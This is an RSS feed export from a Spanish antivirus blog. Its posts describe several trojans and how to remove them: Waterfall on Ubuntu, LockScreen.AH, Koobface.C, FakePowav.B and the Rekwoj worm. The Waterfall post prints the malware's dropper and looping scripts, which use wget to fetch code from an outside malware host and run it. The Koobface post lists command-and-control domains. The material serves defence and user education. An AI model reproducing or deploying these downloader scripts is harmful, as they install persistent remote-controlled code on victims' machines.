<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Antivirus, Antispam, Antispyware &#187; Troyano</title>
	<atom:link href="http://www.protegeme.es/antivirus/category/troyano/feed" rel="self" type="application/rss+xml" />
	<link>http://www.protegeme.es</link>
	<description>Informacion sobre antivirus: Proteccion para ordenadores personales y de empresas</description>
	<lastBuildDate>Fri, 25 Nov 2011 10:18:25 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Troyano Waterfall en Ubuntu</title>
		<link>http://www.protegeme.es/antivirus/troyano-waterfall-en-ubuntu</link>
		<comments>http://www.protegeme.es/antivirus/troyano-waterfall-en-ubuntu#comments</comments>
		<pubDate>Fri, 11 Dec 2009 17:41:26 +0000</pubDate>
		<dc:creator>AntiVirus</dc:creator>
				<category><![CDATA[Troyano]]></category>
		<category><![CDATA[Debian]]></category>
		<category><![CDATA[Gnome]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://www.protegeme.es/?p=308</guid>
		<description><![CDATA[Ubuntu no es inmune a los troyanos y virus. En esta caso se trata de Waterfall, un troyano para Ubuntu y otros sistemas Linux basados en Debian. Se encuentra oculto en un fichero .deb de salvapantallas que se había colocado en Gnome-Look.]]></description>
			<content:encoded><![CDATA[<h2>Como saber si está infectado por el Troyano Waterfall</h2>
<p>Solo en el caso de que haya instalado el fichero .deb en cuestión y solo en ese caso, abrir un terminal y ejecutar el siguiente comando:</p>
<pre>sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash &amp;&amp; sudo dpkg -r app5552</pre>
<p>Este troyano accede al sistema cuando el usuario descarga e instala desde Gnome-Look lo que aparentemente es un salvapantallas con una imagen de una cascada.</p>
<p>Dentro del fichero .deb se encuentra un script con el siguiente código:</p>
<pre>#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit</pre>
<p>Al ser instalado, se descargan otros scripts que al ser ejecutados descargan nuevo código malicioso.</p>
<p>Por ejemplo, el contenido del fichero Auto.bash es el siguiente:</p>
<pre>while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done</pre>
<p>El objetivo final del troyano es hacer parte al PC infectado de un ataque de denegación de servicio distribuido (DDOS)</p>
<p><strong>Nombre completo:</strong> Trojan.LINUX/Waterfall<br />
<strong>Tipo:</strong> [Trojan] &#8211; Caballo de Troya: programa que parece beneficioso o útil pero resulta ser malicioso en algún momento. No se propaga por sí mismo.<br />
<strong>Plataforma:</strong> [LINUX] &#8211; Linux</p>
<p>NOTA: El salvapantallas ha sido eliminado de la web de Gnome-Look.</p>
<p>NOTA: Los ficheros que el troyano descarga desde http://05748.t35.com ya no están disponibles.</p>
<h3  class="related_post_title">Posts relacionados</h3><ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.protegeme.es/antivirus/troyano-waterfall-en-ubuntu/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>LockScreen.AH. Virus que pide que envies un SMS para desbloquearlo</title>
		<link>http://www.protegeme.es/antivirus/lockscreen-ah</link>
		<comments>http://www.protegeme.es/antivirus/lockscreen-ah#comments</comments>
		<pubDate>Fri, 21 Aug 2009 11:07:37 +0000</pubDate>
		<dc:creator>AntiVirus</dc:creator>
				<category><![CDATA[Troyano]]></category>
		<category><![CDATA[Eset]]></category>

		<guid isPermaLink="false">http://www.protegeme.es/?p=294</guid>
		<description><![CDATA[LockScreen.AH es un troyano que bloquea el acceso al ordenador del sistema infectado, mostrando un mensaje en el que te solicita enviar un SMS a un número de SMS Premium para desbloquear el ordenador.]]></description>
			<content:encoded><![CDATA[<p>Una nueva generación de virus para el PC son aquellos que solicitan el envio de un mensaje de movil premium, al estilo de los programas de televisión para solicitar el desbloqueo de tu ordenador. En este caso, el LockScreen.AH se nutre para su propagación de un troyano y bloquea el acceso al SO del ordenador infectado.</p>
<h2>Como saber si está infectado con el LockScreen.AH</h2>
<p>Tu ordenador se bloquea y para desbloquearse te pide un código que has de pedir por SMS, un SMS premium de coste elevado.</p>
<p>En caso de que aparezcan en tu ordenador los siguientes ficheros:</p>
<ul>
<li>axjvk.exe</li>
<li>csbto.exe</li>
<li>iunmj.exe</li>
<li>lpyyi.exe</li>
<li>mpjwz.exe</li>
</ul>
<p>Y en el registro de Windows las siguientes claves</p>
<ul>
<li><strong>Clave:</strong> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</li>
<li><strong>Valor:</strong> &#8220;windll&#8221; = &#8220;[ruta y nombre del archivo]&#8220;</li>
<li><strong>Clave:</strong> HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</li>
<li><strong>Valor:</strong> &#8220;windll&#8221; = &#8220;[ruta y nombre del archivo]&#8220;</li>
</ul>
<h2>Como eliminar y quitar el LockScreen.AH</h2>
<p>Para eliminar el LockScreen.AH hay dos formas:</p>
<h3>Primera forma de eliminar el LockScreen.AH</h3>
<p>intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.</p>
<p>En caso de que no funcione o no pueda restaurar el sistema, para quitar el LockScreen.AH pruebe lo siguiente:</p>
<ol>
<li>Desactivar temporalmente la Restauración del Sistema.</li>
<li>Reiniciar el ordenador a Modo a Prueba de Fallos.</li>
<li>Con un antivirus actualizado, borre y ataque todos los archivos infectados.</li>
<li>Elimine los archivos explicados en <strong>¿Como saber si está infectado?</strong></li>
<li>En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.</li>
<li>Edite el registro y elimine los parámetros explicados en <strong>¿Como saber si está infectado?</strong></li>
<li>Eliminar archivos temporales</li>
<li>Reiniciar el ordenador</li>
</ol>
<h3>Segunda forma de eliminar el LockScreen.AH</h3>
<p><a title="Eset" href="http://www.protegeme.es/antivirus/tag/eset">Eset </a>ha creado un generador de claves, que permite el acceso al sistema. Para desbloquear el equipo, lo primer es ejecutar el programa descargado, para introducir el numero de 4 digitos que muestra la pantalla en el ordenador que está infectado. Pulsar Generate. Tras ello, el programa generará y mostrará un código que deberemos usar, introduciéndola en la ventana que bloquea al equipo infectado.</p>
<p>Necesitará habilitar el Intérprete de comandos y el editor de Registro.</p>
<ol>
<li>Inicio y Ejecutar</li>
<li>Escribir en la venta que se abre la siguiente instrucción:<br />
<code>reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f</code></li>
<li>Pulsar Aceptar</li>
</ol>
<ol>
<li>Inicio y Ejecutar</li>
<li>Escribir en la ventana, de nuevo, la siguiente instrucción: <code>reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableCMD /f</code></li>
<li>Pulsar Aceptar</li>
</ol>
<p class="download">Descargar el generador de claves<a href="http://download.eset.com/special/encyclopaedia/ESETLockScreenAGKeygen.exe">aqui</a></p>
<h3  class="related_post_title">Posts relacionados</h3><ul class="related_post"><li><a href="http://www.protegeme.es/antivirus/listado-de-programas-antivirus-reales" title="Listado de programas antivirus reales">Listado de programas antivirus reales</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/eset-smart-security" title="Descargar ESET Smart Security">Descargar ESET Smart Security</a> (1)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.protegeme.es/antivirus/lockscreen-ah/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Virus Koobface.C</title>
		<link>http://www.protegeme.es/antivirus/koobface-c</link>
		<comments>http://www.protegeme.es/antivirus/koobface-c#comments</comments>
		<pubDate>Fri, 17 Jul 2009 10:49:03 +0000</pubDate>
		<dc:creator>AntiVirus</dc:creator>
				<category><![CDATA[Troyano]]></category>
		<category><![CDATA[Redes sociales]]></category>

		<guid isPermaLink="false">http://www.protegeme.es/?p=279</guid>
		<description><![CDATA[El Koobface.C es un troyano que permite ejecutar comandos en el sistema comprometido. Roba información de "cookies" de identificación de redes sociales y se autopropaga incluyendo enlaces que los usuarios clican.]]></description>
			<content:encoded><![CDATA[<p>Las redes sociales suelen estar siempre en el punto de mira de los usuarios malintencionados por su facilidad de acceso y sus pocas restricciones, pero es el punto de partida para unos ataques mucho mas profundos y utilizan estos como &#8220;trampolin&#8221; para acceder a mas información.</p>
<p>Este es el caso del Virus Koobface.C. Se trata de un troyano que aprovecha sus funcionalidades de &#8220;puerta trasera&#8221; para acceder a los datos de diferentes redes sociales mediante las cookies de autenticacion de sitios como:</p>
<ul>
<li>hi5.com</li>
<li>facebook.com</li>
<li>netlog.com</li>
<li>twitter.com</li>
<li>tagged.com</li>
<li>bebo.com</li>
<li>myspace.com</li>
</ul>
<p>La funcionalidad de puerta trasera permite a un usuario remoto realizar las siguientes operaciones en el sistema comprometido:</p>
<ul>
<li>Descarga y ejecutar un fichero.</li>
<li>Abrir una imagen.</li>
<li>Actualizar el código malicioso.</li>
<li>Bloquear una dirección IP.</li>
<li>Poner un mensaje en Twitter, que es lo que hace de este virus la unica forma de auto-expandirse en internet, ya que, de por si mismo, no es capaz de autoreplicarse.</li>
</ul>
<p>Abre una puerta trasera en el sistema comprometido y se conecta con uno de los siguientes sitios web:</p>
<ul>
<li>www.trisem.com/achche</li>
<li>www.rd040609-cgpay.com/achche</li>
<li>www.upr0306.com/achche</li>
<li>www.rjulythree.com/achche</li>
<li>www.uthreejuly.com/achche</li>
<li>www.mymegadomain03072009.com/achche</li>
</ul>
<h3>Como saber si se está infectado con el Koobface.C. ¿Como saber si tienes el Koobface.C?</h3>
<p>En caso de que aparezcan en tu ordenador los siguientes ficheros:</p>
<ul>
<li>%Windir%\twitty[DOS NÚMEROS].exe</li>
<li>%Windir\%tw[CINCO NÚMEROS].dat</li>
</ul>
<p>Y en el registro de Windows las siguientes claves</p>
<ul>
<li><strong>Clave:</strong> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<strong></strong></li>
<li><strong>Valor:</strong> &#8220;systwtray&#8221; = &#8220;%Windir%\twitty[TWO DIGIT NUMBER].exe&#8221;</li>
</ul>
<h2>Como eliminar y quitar el <span class="aav_rotulo">Koobface.C</span></h2>
<p>Para eliminar el Koobface.C intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.</p>
<p>En caso de que no funcione o no pueda restaurar el sistema, para quitar el FakePowav.B pruebe lo siguiente:</p>
<ol>
<li>Desactivar temporalmente la Restauración del Sistema.</li>
<li>Reiniciar el ordenador a Modo a Prueba de Fallos.</li>
<li>Con un antivirus actualizado, borre y ataque todos los archivos infectados.</li>
<li>Elimine los archivos explicados en <strong>¿Como saber si está infectado?</strong></li>
<li>En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.</li>
<li>Edite el registro y elimine los parámetros explicados en <strong>¿Como saber si está infectado?</strong></li>
<li>Eliminar archivos temporales</li>
<li>Reiniciar el ordenador</li>
</ol>
<h3  class="related_post_title">Posts relacionados</h3><ul class="related_post"><li><a href="http://www.protegeme.es/antivirus/virus-a-tua-foto" title="Virus &#8216;A tua foto&#8217;">Virus &#8216;A tua foto&#8217;</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/fakepowav-b" title="FakePowav.B">FakePowav.B</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/downandupconficker-w32-downandup-c" title="Tercera variante del Downandup/Conficker: W32 Downandup C">Tercera variante del Downandup/Conficker: W32 Downandup C</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/hackear-facebook" title="Hackear facebook, un negocio muy rentable">Hackear facebook, un negocio muy rentable</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/ataques-a-redes-sociales" title="Ataques a redes sociales">Ataques a redes sociales</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/10-principales-amenazas-seguridad-internet" title="Las 10 principales amenazas de seguridad en internet">Las 10 principales amenazas de seguridad en internet</a> (1)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.protegeme.es/antivirus/koobface-c/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>FakePowav.B</title>
		<link>http://www.protegeme.es/antivirus/fakepowav-b</link>
		<comments>http://www.protegeme.es/antivirus/fakepowav-b#comments</comments>
		<pubDate>Mon, 18 May 2009 12:49:09 +0000</pubDate>
		<dc:creator>AntiVirus</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Troyano]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.protegeme.es/?p=247</guid>
		<description><![CDATA[El FakePowav.B es un troyano que imita la herramienta de eliminación de software malintencionado de Microsoft, mostrando una serie de falsos mensajes de alarma y asegurando que su equipo está infectado por software malicioso, solicitando al usuario la compra de antivirus o diferentes softwares de seguridad.]]></description>
			<content:encoded><![CDATA[<p>Este troyano es una variante de la familia Win32/FakePowav que imita a la perfección la herramienta de eliminación de software malintencionado de la compañía Microsoft. Cuando el troyano se ejecuta, va mostrando falsos mensajes de alarma, mensajes de compras de software de seguridad y similares, en busca de que el atacado realice transacciones en sus páginas y hacerse con los códigos de la tarjeta de crédito. El troyano no puede difundirse por si mismo, sino que requiere la participación de que el usuario se lo descargue y se lo instale.</p>
<blockquote><p>Microsoft Malicious Software Removal Tool is installed. Click this message to start scanning process or it will start automatically in 10 seconds.</p></blockquote>
<div id="attachment_248" class="wp-caption aligncenter" style="width: 372px"><img class="size-full wp-image-248" title="FakePowaw.b pantallazo. Microsoft Malicious Software Removal Tool is installed. Click this message to start scanning process or it will start automatically in 10 seconds" src="http://www.protegeme.es/wp-content/uploads/2009/05/fakepowawb-pantallazo1.jpg" alt="FakePowaw.b. Primera muestra de ataque. Microsoft Malicious Software Removal Tool is installed. Click this message to start scanning process or it will start automatically in 10 seconds" width="362" height="104" /><p class="wp-caption-text">FakePowaw.b. Primera muestra de ataque</p></div>
<p>Si se realiza el clic o si se agotan los 10 segundos que muestra la pantalla, el siguiente pop-up aparecerá, simulando que realiza operaciones de análisis en el ordenador atacado. Decimos simulando por que el análisis no se lleva a cabo en realidad.</p>
<blockquote><p>Quick scan in progress. The tool is scanning your computer for prevalent malicious software.</p></blockquote>
<div id="attachment_249" class="wp-caption aligncenter" style="width: 536px"><img class="size-full wp-image-249" title="FakePowaw.b Segundo pantallazo. Quick scan in progress. The tool is scanning your computer for prevalent malicious software." src="http://www.protegeme.es/wp-content/uploads/2009/05/fakepowawb-pantallazo2.jpg" alt="FakePowaw.b Segundo pantallazo. Quick scan in progress. The tool is scanning your computer for prevalent malicious software." width="526" height="450" /><p class="wp-caption-text">FakePowaw.b Segundo pantallazo</p></div>
<p>El falso antisoftware malicioso FakePowav.B &#8220;encuentra&#8221; una serie de infecciones en el equipo atacado:</p>
<ul>
<li>Kelogger.Stawin</li>
<li>Spyware.ActivityKey</li>
<li>W32.Rinbot.H</li>
<li>W32.Rinbot.H</li>
</ul>
<div id="attachment_250" class="wp-caption aligncenter" style="width: 536px"><img class="size-full wp-image-250" title="FakePowaw.b Pantallazo3" src="http://www.protegeme.es/wp-content/uploads/2009/05/fakepowawb-pantallazo3.jpg" alt="FakePowaw.b Pantallazo3" width="526" height="450" /><p class="wp-caption-text">FakePowaw.b Pantallazo3</p></div>
<p>Y te &#8220;incita&#8221; a adquirir un antivirus con el siguiente mensaje:</p>
<blockquote><p>The tool can&#8217;t remove all malicious software shown in the scan results. Because malicious software is present on your computer, you should use an antivirus product to scan for and remove all malicious software.</p></blockquote>
<p>Mostrando una ventana donde podrás &#8220;comprar&#8221; los softwares de antivirus mas famosos del mercado: <a title="Norton Antivirus" href="http://www.protegeme.es/antivirus/tag/norton">Norton</a>, <a title="McAfee" href="http://www.protegeme.es/antivirus/tag/mcafee">McAfee</a>,&#8230;</p>
<blockquote><p>OEM Purchase Center. This service helps keep your computer more secure and up to date with latest software for Windows.</p></blockquote>
<div id="attachment_252" class="wp-caption aligncenter" style="width: 547px"><img class="size-full wp-image-252" title="FakePowaw.b OEM Purchase Center. This service helps keep your computer more secure and up to date with latest software for Windows." src="http://www.protegeme.es/wp-content/uploads/2009/05/fakepowawb-pantallazo4.jpg" alt="FakePowaw.b OEM Purchase Center. This service helps keep your computer more secure and up to date with latest software for Windows." width="537" height="383" /><p class="wp-caption-text">FakePowaw.b Pantallazo de compra</p></div>
<p>Puedes cerrar la ventana sin comprar, pero aparecerá una burbuja en la barra de tareas inferior donde aparece el siguiente texto:</p>
<blockquote><p>Security warning. Your computer is infected with malicious software. You should use antivirus product to remove it. Click this message to purchase recommended antivirus software.</p></blockquote>
<div id="attachment_253" class="wp-caption aligncenter" style="width: 335px"><img class="size-full wp-image-253" title="FakePowaw.b Burbuja remanente. Security warning. Your computer is infected with malicious software. You should use antivirus product to remove it. Click this message to purchase recommended antivirus software." src="http://www.protegeme.es/wp-content/uploads/2009/05/fakepowawbburbuja.jpg" alt="FakePowaw.b Burbuja remanente. Security warning. Your computer is infected with malicious software. You should use antivirus product to remove it. Click this message to purchase recommended antivirus software." width="325" height="117" /><p class="wp-caption-text">FakePowaw.b Burbuja remanente</p></div>
<p>Sin embargo, en caso de que el atacado sea incauto y se dirija a la compra del software de antivirus, la web que se abrirá será <strong>oem-micro-store.com</strong></p>
<p>El <strong>troyano FakePowav.B</strong> se mostrará con la siguiente pantalla, donde imitará al Windows Security Center, y le mostrará como si el antivirus, la protección contra virus estuviera deshabilitada.</p>
<div id="attachment_254" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.protegeme.es/wp-content/uploads/2009/05/security-centerexe.jpg"><img class="size-medium wp-image-254" title="Troyano FakePowav.B Security Center.exe" src="http://www.protegeme.es/wp-content/uploads/2009/05/security-centerexe-300x243.jpg" alt="Troyano FakePowav.B Security Center.exe" width="300" height="243" /></a><p class="wp-caption-text">Troyano FakePowav.B Security Center.exe</p></div>
<h3>Como saber si se está infectado con el FakePowav.B. ¿Como saber si tienes el FakePowav.B?</h3>
<p>En caso de que aparezcan en tu ordenador los siguientes ficheros:</p>
<ul>
<li><em>Carpeta de Archivos de programas</em>\MalwareRemoval\MalwareRemoval.exe</li>
<li><em>Carpeta de Archivos de programas</em>\MalwareRemoval\Security Center.exe</li>
<li><em>X</em><em>:\Windows\Profiles\{<em>nombre de usuario</em>}\Application Data</em><em></em>\1\spl.ini</li>
<li><em>X</em><em>:\Windows\Profiles\{<em>nombre de usuario</em>}\Application Data</em>\MalwareRemoval\MalwareRemoval.ini</li>
</ul>
<p>En caso de manejar otros Windows como el NT, la carpeta de Archivos de Programas podría ser C:\Program Files y en el caso de la carpeta de Application Data <em>C:\WINNT\Profiles\{<em>nombre de usuario</em>}\Application Data</em></p>
<p>En caso de manejar windows 2000, XP o Server 2003, la carpeta de Aplication Data sería C<em>:\Documents and Settings\{<em>nombre de usuario</em>}\Local Settings\Application Data</em></p>
<h2>Como eliminar y quitar el FakePowav.B</h2>
<p>Para eliminar el FakePowav.B intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.</p>
<p>En caso de que no funcione o no pueda restaurar el sistema, para quitar el FakePowav.B pruebe lo siguiente:</p>
<ol>
<li>Desactivar temporalmente la Restauración del Sistema.</li>
<li>Reiniciar el ordenador a Modo a Prueba de Fallos.</li>
<li>Con un antivirus actualizado, borre y ataque todos los archivos infectados.</li>
<li>Elimine los archivos explicados en <strong>¿Como saber si está infectado?</strong></li>
<li>En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.</li>
<li>Edite el registro y elimine los parámetros explicados en <strong>¿Como saber si está infectado?</strong></li>
<li>Eliminar archivos temporales</li>
<li>Reiniciar el ordenador</li>
</ol>
<p class="note">Fuente: Microsoft<a href="http://www.microsoft.com/security/portal/Entry.aspx?name=Trojan%3aWin32%2fFakePowav.B">(+)</a></p>
<h3  class="related_post_title">Posts relacionados</h3><ul class="related_post"><li><a href="http://www.protegeme.es/antivirus/peerfrag-fm" title="Peerfrag.FM">Peerfrag.FM</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/koobface-c" title="Virus Koobface.C">Virus Koobface.C</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/gusano-alcan" title="Gusano Alcan">Gusano Alcan</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/gusano-eggdrop-aa" title="Gusano Eggdrop.AA">Gusano Eggdrop.AA</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/downandupconficker-w32-downandup-c" title="Tercera variante del Downandup/Conficker: W32 Downandup C">Tercera variante del Downandup/Conficker: W32 Downandup C</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/10-principales-amenazas-seguridad-internet" title="Las 10 principales amenazas de seguridad en internet">Las 10 principales amenazas de seguridad en internet</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/avg-microsoft-antivirus-grati" title="AVG anuncia la lucha contra Microsoft por el Antivirus gratuito">AVG anuncia la lucha contra Microsoft por el Antivirus gratuito</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/que-es-alertvir" title="Que es Alertvir">Que es Alertvir</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/morro-antivirus-microsoft-gratis" title="Morro: Antivirus Microsoft Gratis">Morro: Antivirus Microsoft Gratis</a> (2)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.protegeme.es/antivirus/fakepowav-b/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Gusano Rekwoj: Como eliminarlo</title>
		<link>http://www.protegeme.es/antivirus/gusano-rekwoj</link>
		<comments>http://www.protegeme.es/antivirus/gusano-rekwoj#comments</comments>
		<pubDate>Mon, 29 Dec 2008 18:16:21 +0000</pubDate>
		<dc:creator>AntiVirus</dc:creator>
				<category><![CDATA[gusano]]></category>
		<category><![CDATA[Troyano]]></category>
		<category><![CDATA[Peligrosidad: 3]]></category>

		<guid isPermaLink="false">http://www.protegeme.es/?p=141</guid>
		<description><![CDATA[El virus o Gusano Rekwoj afecta al sistema explotando, una vez mas, las vulnerabilidades del sistema operativo de Windows de 32 bits. Se instala en el directorio %Temp%\%Tempfile%. Se contagia a través de redes P2P, IRC (Internet Relay Chat), unidades de red y correo electrónico.]]></description>
			<content:encoded><![CDATA[<p>El virus o <strong>Gusano Rekwoj</strong> se contagia a través de redes P2P, IRC (Internet Relay Chat), unidades de red y correo electrónico. El Gusano Rekwoj es un troyano del tipo <strong>Trojan.W32</strong> (que ya explicamos en su dia <a title="Eliminar Troyano Wow.VM o Trojan.W32" href="http://www.protegeme.es/antivirus/wow-vm-love-jpg">como eliminarlo</a>), un caballo de Troya que resulta ser mailicioso. No se propaga de motu propio y requiere de la interacción del usuario.</p>
<p>En caso de que no pueda realizar una restauración del sistema o no funcione el punto de restauracion (se recomienda restaurar, pero en caso de que no pueda restaurar el Sistema Operativo a una versión anterior o no funcione, recomendamos, antes de seguir, deshabilitar la<strong> Restauracion del Sistema</strong>).</p>
<p>Para <strong>eliminar el gusano Rekwoj</strong> ha de realizar lo siguiente:</p>
<ul>
<li>Reinicie el ordenador en <em>Modo Seguro</em>, en modo <em>A prueba de fallos</em>.</li>
<li>Pase su Antivirus (en caso de no tener ningun <a title="Antivirus" href="http://www.mysecuritycenter.com/mymsc2">antivirus</a>, no dude en descargar la siguiente versión de prueba de <strong>MySecurity Center</strong>)</li>
<li>Elimine los siguientes ficheros que puede encontrar en <strong>%Temp%\%Tempfile% </strong>(Donde <strong>%Temp%</strong> es el directorio de archivos temporales de Windows)<strong><br />
</strong></p>
<ul>
<li><strong>b2e.dll</strong></li>
<li>binaries.txt</li>
<li>Document.rar</li>
<li><strong>Document.bat</strong></li>
</ul>
</li>
<li>Eliminar todos los archivos temporales del ordenador</li>
<li>Vaciar la papelera de reciclaje.</li>
</ul>
<p>En caso de que no se pueda reparar la infección, en caso de no poder borrar los ficheros (es probable que los ficheros estén residentes en memoria) hay que hacer lo siguiente:</p>
<ul>
<li>Abrir el Administrador de Tareas (Ctrl + Alt + Supr)</li>
<li>Buscar Document.bat y pararlo</li>
<li>Volver al punto de &#8220;<em>eliminar los siguientes ficheros que puede encontrar en <strong>%Temp%\%Tempfile% </strong>(Donde <strong>%Temp%</strong> es el directorio de archivos temporales de Windows)</em><strong>&#8221;<br />
</strong></li>
</ul>
<h3>Resumen del Gusano Rekwoj</h3>
<p><strong>Nombre completo:</strong> Trojan.W32/Rekwoj</p>
<p><strong>Tipo:</strong> Caballo de Troya. No se propaga solo.</p>
<p><strong>Plataforma:</strong> Ejecutable PE (.EXE, .SCR, .DLL) que corre en Windows de 32 bits: 95, 98, Me, NT, 2000, XP, 2003</p>
<p><strong>Alias</strong>: <strong>Win32/Rekwoj.A</strong> o <strong>BAT/Rekwoj.A</strong></p>
<h3  class="related_post_title">Posts relacionados</h3><ul class="related_post"><li><a href="http://www.protegeme.es/antivirus/registry-optimizer-aido" title="Registry Optimizer de Aido">Registry Optimizer de Aido</a> (0)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.protegeme.es/antivirus/gusano-rekwoj/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ataques a redes sociales</title>
		<link>http://www.protegeme.es/antivirus/ataques-a-redes-sociales</link>
		<comments>http://www.protegeme.es/antivirus/ataques-a-redes-sociales#comments</comments>
		<pubDate>Sun, 28 Dec 2008 11:41:21 +0000</pubDate>
		<dc:creator>AntiVirus</dc:creator>
				<category><![CDATA[gusano]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Personajes]]></category>
		<category><![CDATA[Sites peligrosos]]></category>
		<category><![CDATA[Spyware]]></category>
		<category><![CDATA[Troyano]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[Redes sociales]]></category>

		<guid isPermaLink="false">http://www.protegeme.es/?p=127</guid>
		<description><![CDATA[De un tiempo a esta parte, sobre todo desde hace 2 meses aproximadamente, los ataques a redes sociales se han intensificado, sobre todo en paises hispanoamericanos. El gran número de poblacion con acceso a internet y con telefónos móviles con acceso a internet, además de que en estos paises, la regulación por ley es aún muy laxa. Esto ha hecho que estas redes sociales sean fruto de los ataques para conseguir un mayor acceso a redes financieras (y a sus clientes)]]></description>
			<content:encoded><![CDATA[<p>En una entrevista realizada a <strong>Eugene Kaspersky</strong>, presidente de la firma de <strong>Antivirus Kapersky Lab</strong>, el señor Kaspersky afirmó que los ataques no sólo se dan en la Web 2.0, sino también en instituciones bancarias, con el fin de robar identidades, lucrarse con ellas y obtener jugosas ganancias. Además comentó que los cyber-atacantes no son orihundos de estos paises, sino mas bien de China y Rusia.</p>
<p>Los ataques por uso de codigo malicioso, virus, troyanos y similares son los mas usados para hacerse con las transacciones bancarias a través del acceso para posterior robo de sus bases de datos. Así pues el modus operandi es claro: acceso a los sistemas de instituciones financieras para la obtención de cuentas de correo electrónicos y conseguir hacerse con el control de los usuarios de bancos, muchos mas facil de &#8220;timar&#8221; que una gran entidad bancaria.</p>
<p>También habló <strong>Dmitry Bestuzhev</strong>, analista de virus para América Latina de Kaspersky Lab.,</p>
<blockquote><p>estos ataques son producidos en la impunidad total, ya que en la región, en especial en México, no hay una regulación adecuada para atacar a los delincuentes cibernéticos. Si bien en el país existe una Policía Informática, la Agencia Federal de Investigación (AFI) sólo se concentra en investigar redes de criminales de pornografía infantil que utilizan la Internet, sin considerar que existen otras áreas descuidadas como es el robo de identidad y la sustracción de recursos a través de transacciones bancarias, e incluso, en las nuevas modalidades para robar recursos vía SMS en celulares.</p>
<p>A través del engaño a usuarios desprevenidos los cibercriminales cometen sus fechorías. Mediante supuestos premios obtenidos en concursos, se envían mensajes SMS, diciendo que se ganó un premio, y sólo debe reenviar el mensaje con alguna leyenda. Con ello, los delincuentes roban identidad y el saldo del teléfono celular.</p></blockquote>
<p>La mayor parte de estos robos se deben, sobre todo, al descuido de los usuarios que carecen de una cultura informática que dejan &#8220;abiertas las puertas&#8221; a los cyber-delincuentes: son los mas propensos a contestar ataques de phishing, contestar mensajes en los teléfonos moviles y similares.</p>
<p>Números de la ciberdelincuencia</p>
